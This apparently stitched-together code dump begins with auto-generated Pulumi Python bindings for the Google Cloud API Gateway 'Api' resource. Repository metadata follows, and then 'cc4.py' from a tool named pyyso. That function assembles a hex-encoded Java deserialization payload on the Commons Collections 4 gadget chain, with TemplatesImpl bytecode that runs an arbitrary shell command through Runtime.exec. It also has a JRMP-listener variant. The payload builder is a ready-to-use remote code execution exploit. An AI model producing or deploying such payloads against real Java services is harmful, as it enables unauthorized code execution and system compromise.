return pulumi.get(self, "managed_service")
@managed_service.setter
def managed_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_service", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
@pulumi.input_type
class _ApiState:
def __init__(__self__, *,
api_id: Optional[pulumi.Input[str]] = None,
create_time: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering Api resources.
:param pulumi.Input[str] api_id: Identifier to assign to the API. Must be unique within scope of the parent resource(project)
:param pulumi.Input[str] create_time: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] display_name: A user-visible name for the API.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Resource labels to represent user-provided metadata.
:param pulumi.Input[str] managed_service: Immutable. The name of a Google Managed Service ( https://cloud.google.com/service-infrastructure/docs/glossary#managed).
If not specified, a new Service will automatically be created in the same project as this API.
:param pulumi.Input[str] name: The resource name of the API. Format 'projects/{{project}}/locations/global/apis/{{apiId}}'
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
if api_id is not None:
pulumi.set(__self__, "api_id", api_id)
if create_time is not None:
pulumi.set(__self__, "create_time", create_time)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if managed_service is not None:
pulumi.set(__self__, "managed_service", managed_service)
if name is not None:
pulumi.set(__self__, "name", name)
if project is not None:
pulumi.set(__self__, "project", project)
@property
@pulumi.getter(name="apiId")
def api_id(self) -> Optional[pulumi.Input[str]]:
"""
Identifier to assign to the API. Must be unique within scope of the parent resource(project)
"""
return pulumi.get(self, "api_id")
@api_id.setter
def api_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "api_id", value)
@property
@pulumi.getter(name="createTime")
def create_time(self) -> Optional[pulumi.Input[str]]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "create_time")
@create_time.setter
def create_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "create_time", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
A user-visible name for the API.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource labels to represent user-provided metadata.
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="managedService")
def managed_service(self) -> Optional[pulumi.Input[str]]:
"""
Immutable. The name of a Google Managed Service ( https://cloud.google.com/service-infrastructure/docs/glossary#managed).
If not specified, a new Service will automatically be created in the same project as this API.
"""
return pulumi.get(self, "managed_service")
@managed_service.setter
def managed_service(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "managed_service", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The resource name of the API. Format 'projects/{{project}}/locations/global/apis/{{apiId}}'
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def project(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project", value)
class Api(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A consumable API that can be used by multiple Gateways.
To get more information about Api, see:
* [API documentation](https://cloud.google.com/api-gateway/docs/reference/rest/v1beta/projects.locations.apis)
* How-to Guides
* [Official Documentation](https://cloud.google.com/api-gateway/docs/quickstart)
## Example Usage
### Apigateway Api Basic
```python
import pulumi
import pulumi_gcp as gcp
api = gcp.apigateway.Api("api", api_id="api",
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
Api can be imported using any of these accepted formats
```sh
$ pulumi import gcp:apigateway/api:Api default projects/{{project}}/locations/global/apis/{{api_id}}
```
```sh
$ pulumi import gcp:apigateway/api:Api default {{project}}/{{api_id}}
```
```sh
$ pulumi import gcp:apigateway/api:Api default {{api_id}}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_id: Identifier to assign to the API. Must be unique within scope of the parent resource(project)
:param pulumi.Input[str] display_name: A user-visible name for the API.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Resource labels to represent user-provided metadata.
:param pulumi.Input[str] managed_service: Immutable. The name of a Google Managed Service ( https://cloud.google.com/service-infrastructure/docs/glossary#managed).
If not specified, a new Service will automatically be created in the same project as this API.
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ApiArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A consumable API that can be used by multiple Gateways.
To get more information about Api, see:
* [API documentation](https://cloud.google.com/api-gateway/docs/reference/rest/v1beta/projects.locations.apis)
* How-to Guides
* [Official Documentation](https://cloud.google.com/api-gateway/docs/quickstart)
## Example Usage
### Apigateway Api Basic
```python
import pulumi
import pulumi_gcp as gcp
api = gcp.apigateway.Api("api", api_id="api",
opts=pulumi.ResourceOptions(provider=google_beta))
```
## Import
Api can be imported using any of these accepted formats
```sh
$ pulumi import gcp:apigateway/api:Api default projects/{{project}}/locations/global/apis/{{api_id}}
```
```sh
$ pulumi import gcp:apigateway/api:Api default {{project}}/{{api_id}}
```
```sh
$ pulumi import gcp:apigateway/api:Api default {{api_id}}
```
:param str resource_name: The name of the resource.
:param ApiArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ApiArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
api_id: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ApiArgs.__new__(ApiArgs)
if api_id is None and not opts.urn:
raise TypeError("Missing required property 'api_id'")
__props__.__dict__["api_id"] = api_id
__props__.__dict__["display_name"] = display_name
__props__.__dict__["labels"] = labels
__props__.__dict__["managed_service"] = managed_service
__props__.__dict__["project"] = project
__props__.__dict__["create_time"] = None
__props__.__dict__["name"] = None
super(Api, __self__).__init__(
'gcp:apigateway/api:Api',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
api_id: Optional[pulumi.Input[str]] = None,
create_time: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
managed_service: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
project: Optional[pulumi.Input[str]] = None) -> 'Api':
"""
Get an existing Api resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_id: Identifier to assign to the API. Must be unique within scope of the parent resource(project)
:param pulumi.Input[str] create_time: Creation timestamp in RFC3339 text format.
:param pulumi.Input[str] display_name: A user-visible name for the API.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] labels: Resource labels to represent user-provided metadata.
:param pulumi.Input[str] managed_service: Immutable. The name of a Google Managed Service ( https://cloud.google.com/service-infrastructure/docs/glossary#managed).
If not specified, a new Service will automatically be created in the same project as this API.
:param pulumi.Input[str] name: The resource name of the API. Format 'projects/{{project}}/locations/global/apis/{{apiId}}'
:param pulumi.Input[str] project: The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ApiState.__new__(_ApiState)
__props__.__dict__["api_id"] = api_id
__props__.__dict__["create_time"] = create_time
__props__.__dict__["display_name"] = display_name
__props__.__dict__["labels"] = labels
__props__.__dict__["managed_service"] = managed_service
__props__.__dict__["name"] = name
__props__.__dict__["project"] = project
return Api(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="apiId")
def api_id(self) -> pulumi.Output[str]:
"""
Identifier to assign to the API. Must be unique within scope of the parent resource(project)
"""
return pulumi.get(self, "api_id")
@property
@pulumi.getter(name="createTime")
def create_time(self) -> pulumi.Output[str]:
"""
Creation timestamp in RFC3339 text format.
"""
return pulumi.get(self, "create_time")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
A user-visible name for the API.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def labels(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource labels to represent user-provided metadata.
"""
return pulumi.get(self, "labels")
@property
@pulumi.getter(name="managedService")
def managed_service(self) -> pulumi.Output[str]:
"""
Immutable. The name of a Google Managed Service ( https://cloud.google.com/service-infrastructure/docs/glossary#managed).
If not specified, a new Service will automatically be created in the same project as this API.
"""
return pulumi.get(self, "managed_service")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name of the API. Format 'projects/{{project}}/locations/global/apis/{{apiId}}'
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project")
| 41.790698 | 171 | 0.634188 | 2,417 | 19,767 | 5.009516 | 0.083575 | 0.085398 | 0.091345 | 0.074496 | 0.861992 | 0.838619 | 0.825405 | 0.816733 | 0.804675 | 0.784688 | 0 | 0.001293 | 0.25669 | 19,767 | 472 | 172 | 41.879237 | 0.822773 | 0.389589 | 0 | 0.700422 | 1 | 0 | 0.078023 | 0.002043 | 0 | 0 | 0 | 0 | 0 | 1 | 0.160338 | false | 0.004219 | 0.021097 | 0 | 0.278481 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7af8890041f34912d89275698ee7f60146c88aad | 17,084 | py | Python | src/pyyso/yso/cc4.py | cokeBeer/pyyso | c29171a5d2aea0d0c524fec4d8d6d0a1084f659f | [
"MIT"
] | 2 | 2022-03-18T15:17:25.000Z | 2022-03-19T05:21:30.000Z | src/pyyso/yso/cc4.py | cokeBeer/pyyso | c29171a5d2aea0d0c524fec4d8d6d0a1084f659f | [
"MIT"
] | null | null | null | src/pyyso/yso/cc4.py | cokeBeer/pyyso | c29171a5d2aea0d0c524fec4d8d6d0a1084f659f | [
"MIT"
] | null | null | null | def cc4(cmd: str, jrmp: bool = True) -> bytes:
if jrmp:
prefix = "51aced0005770f02628afa5d00000180c6de517480017372002e6a617661782e6d616e6167656d656e742e42616441747472696275746556616c7565457870457863657074696f6ed4e7daab632d46400200014c000376616c7400124c6a6176612f6c616e672f4f626a6563743b70787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc402000070787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d6573736167657400124c6a6176612f6c616e672f537472696e673b5b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b70787071007e0008707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd2239020000707870000000047372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00054c000866696c654e616d6571007e00054c000a6d6574686f644e616d6571007e00057078700000011b74001e79736f73657269616c2e6578706c6f69742e4a524d504c697374656e65727400114a524d504c697374656e65722e6a617661740006646f43616c6c7371007e000b000000e071007e000d71007e000e740009646f4d6573736167657371007e000b000000ab71007e000d71007e000e74000372756e7371007e000b0000007771007e000d71007e000e7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e0007707872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b707870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65707870000000007704000000007871007e001b78737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b70787000000002737200426f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e636f6d70617261746f72732e5472616e73666f726d696e67436f6d70617261746f722ff984f02bb108cc0200024c00096465636f726174656471007e001d4c000b7472616e73666f726d657274002d4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e73342f5472616e73666f726d65723b74001966696c653a2f707269766174652f746d702f79736f2e6a61727870737200406f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000074001966696c653a2f707269766174652f746d702f79736f2e6a617278707372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002e5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e73342f5472616e73666f726d65723b74001966696c653a2f707269766174652f746d702f79736f2e6a617278707572002e5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e5472616e73666f726d65723b39813afb08da3fa502000074001966696c653a2f707269766174652f746d702f79736f2e6a61727870000000027372003c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e000174001966696c653a2f707269766174652f746d702f79736f2e6a6172787076720037636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e5472415846696c74657200000000000000000000007078707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e496e7374616e74696174655472616e73666f726d6572348bf47fa486d03b0200025b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b74001966696c653a2f707269766174652f746d702f79736f2e6a61727870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c020000707870000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000649000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785b000a5f62797465636f6465737400035b5b425b00065f636c61737371007e00344c00055f6e616d6571007e00054c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b70787000000000ffffffff757200035b5b424bfd19156767db3702000070787000000002757200025b42acf317f8060854e0020000707870"
midfix = "cafebabe0000003200390a0003002207003707002507002601001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010013537475625472616e736c65745061796c6f616401000c496e6e6572436c61737365730100354c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b2956010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a457863657074696f6e730700270100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07002801003379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324537475625472616e736c65745061796c6f6164010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740100146a6176612f696f2f53657269616c697a61626c65010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e01001f79736f73657269616c2f7061796c6f6164732f7574696c2f476164676574730100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01"
postfix = "08003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001e79736f73657269616c2f50776e65723233323638333730383139333733390100204c79736f73657269616c2f50776e65723233323638333730383139333733393b002100020003000100040001001a000500060001000700000002000800040001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000002f000e0000000c000100000005000f003800000001001300140002000c0000003f0000000300000001b100000002000d00000006000100000034000e00000020000300000001000f0038000000000001001500160001000000010017001800020019000000040001001a00010013001b0002000c000000490000000400000001b100000002000d00000006000100000038000e0000002a000400000001000f003800000000000100150016000100000001001c001d000200000001001e001f00030019000000040001001a00080029000b0001000c00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002000000002002100110000000a000100020023001000097571007e003f000001d4cafebabe00000032001b0a0003001507001707001807001901001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c6501000474686973010003466f6f01000c496e6e6572436c61737365730100254c79736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f3b01000a536f7572636546696c6501000c476164676574732e6a6176610c000a000b07001a01002379736f73657269616c2f7061796c6f6164732f7574696c2f4761646765747324466f6f0100106a6176612f6c616e672f4f626a6563740100146a6176612f696f2f53657269616c697a61626c6501001f79736f73657269616c2f7061796c6f6164732f7574696c2f47616467657473002100020003000100040001001a000500060001000700000002000800010001000a000b0001000c0000002f00010001000000052ab70001b100000002000d0000000600010000003c000e0000000c000100000005000f001200000002001300000002001400110000000a000100020016001000097074000450776e727077010078757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a99020000707870000000017672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c617465730000000000000000000000707870770400000003737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756570787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b0200007078700000000171007e004978"
length = (0x696 + len(cmd)).to_bytes(4, byteorder='big').hex()
length2 = len(cmd).to_bytes(2, byteorder='big').hex()
hexdata = prefix + length + midfix + length2 + cmd.encode().hex() + postfix
data = bytes.fromhex(hexdata)
return data
prefix = "aced0005737200176a6176612e7574696c2e5072696f72697479517565756594da30b4fb3f82b103000249000473697a654c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6d70617261746f723b787000000002737200426f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e636f6d70617261746f72732e5472616e73666f726d696e67436f6d70617261746f722ff984f02bb108cc0200024c00096465636f726174656471007e00014c000b7472616e73666f726d657274002d4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e73342f5472616e73666f726d65723b7870737200406f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e636f6d70617261746f72732e436f6d70617261626c65436f6d70617261746f72fbf49925b86eb13702000078707372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002e5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e73342f5472616e73666f726d65723b78707572002e5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e5472616e73666f726d65723b39813afb08da3fa50200007870000000027372003c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b787076720037636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e5472415846696c746572000000000000000000000078707372003f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e73342e66756e63746f72732e496e7374616e74696174655472616e73666f726d6572348bf47fa486d03b0200025b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007870000000017372003a636f6d2e73756e2e6f72672e6170616368652e78616c616e2e696e7465726e616c2e78736c74632e747261782e54656d706c61746573496d706c09574fc16eacab3303000949000d5f696e64656e744e756d62657249000e5f7472616e736c6574496e6465785a00155f75736553657276696365734d656368616e69736d4c00195f61636365737345787465726e616c5374796c6573686565747400124c6a6176612f6c616e672f537472696e673b4c000b5f617578436c617373657374003b4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f486173687461626c653b5b000a5f62797465636f6465737400035b5b425b00065f636c61737371007e00144c00055f6e616d6571007e00194c00115f6f757470757450726f706572746965737400164c6a6176612f7574696c2f50726f706572746965733b787000000000ffffffff00740003616c6c70757200035b5b424bfd19156767db37020000787000000002757200025b42acf317f8060854e00200007870"
midfix = "cafebabe00000034003907003701002e636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e733424537475625472616e736c65745061796c6f6164070004010040636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f72756e74696d652f41627374726163745472616e736c65740700060100146a6176612f696f2f53657269616c697a61626c6501001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c756505ad2093f391ddef3e0100063c696e69743e010003282956010004436f64650a000300100c000c000d01000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100304c636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e733424537475625472616e736c65745061796c6f61643b0100097472616e73666f726d010072284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b5b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b295601000a457863657074696f6e73070019010039636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f5472616e736c6574457863657074696f6e010008646f63756d656e7401002d4c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b01000868616e646c6572730100425b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b0100a6284c636f6d2f73756e2f6f72672f6170616368652f78616c616e2f696e7465726e616c2f78736c74632f444f4d3b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b4c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b29560100086974657261746f720100354c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f64746d2f44544d417869734974657261746f723b01000768616e646c65720100414c636f6d2f73756e2f6f72672f6170616368652f786d6c2f696e7465726e616c2f73657269616c697a65722f53657269616c697a6174696f6e48616e646c65723b01000a536f7572636546696c65010010436f6d6d6f6e34746573742e6a61766101000c496e6e6572436c617373657307002701001a636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e7334010013537475625472616e736c65745061796c6f61640100083c636c696e69743e0100116a6176612f6c616e672f52756e74696d6507002a01000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b0c002c002d0a002b002e01"
postfix = "08003001000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0c003200330a002b003401000d537461636b4d61705461626c6501001d79736f73657269616c2f50776e6572343330343335363631323736373601001f4c79736f73657269616c2f50776e657234333034333536363132373637363b002100010003000100050001001a000700080001000900000002000a00040001000c000d0001000e0000002f00010001000000052ab7000fb10000000200110000000600010000007d00120000000c000100000005001300380000000100150016000200170000000400010018000e0000003f0000000300000001b10000000200110000000600010000008200120000002000030000000100130038000000000001001a001b000100000001001c001d000200010015001e000200170000000400010018000e000000490000000400000001b10000000200110000000600010000008600120000002a00040000000100130038000000000001001a001b000100000001001f002000020000000100210022000300080029000d0001000e00000024000300020000000fa70003014cb8002f1231b6003557b1000000010036000000030001030002002300000002002400250000000a000100010026002800097571007e0021000001c9cafebabe00000034001b07000201001e636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e733424466f6f0700040100106a6176612f6c616e672f4f626a6563740700060100146a6176612f696f2f53657269616c697a61626c6501001073657269616c56657273696f6e5549440100014a01000d436f6e7374616e7456616c75650571e669ee3c6d47180100063c696e69743e010003282956010004436f64650a000300100c000c000d01000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100204c636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e733424466f6f3b01000a536f7572636546696c65010010436f6d6d6f6e34746573742e6a61766101000c496e6e6572436c617373657307001901001a636f6d6d6f6e342f436f6d6d6f6e436f6c6c656374696f6e7334010003466f6f002100010003000100050001001a000700080001000900000002000a00010001000c000d0001000e0000002f00010001000000052ab7000fb10000000200110000000600010000007600120000000c0001000000050013001400000002001500000002001600170000000a000100010018001a00097074000450776e727077010078757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000017672001d6a617661782e786d6c2e7472616e73666f726d2e54656d706c6174657300000000000000000000007870770400000003737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c7565787200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b02000078700000000171007e002b78"
length = (0x689 + len(cmd)).to_bytes(4, byteorder='big').hex()
length2 = len(cmd).to_bytes(2, byteorder='big').hex()
hexdata = prefix + length + midfix + length2 + cmd.encode().hex() + postfix
data = bytes.fromhex(hexdata)
return data
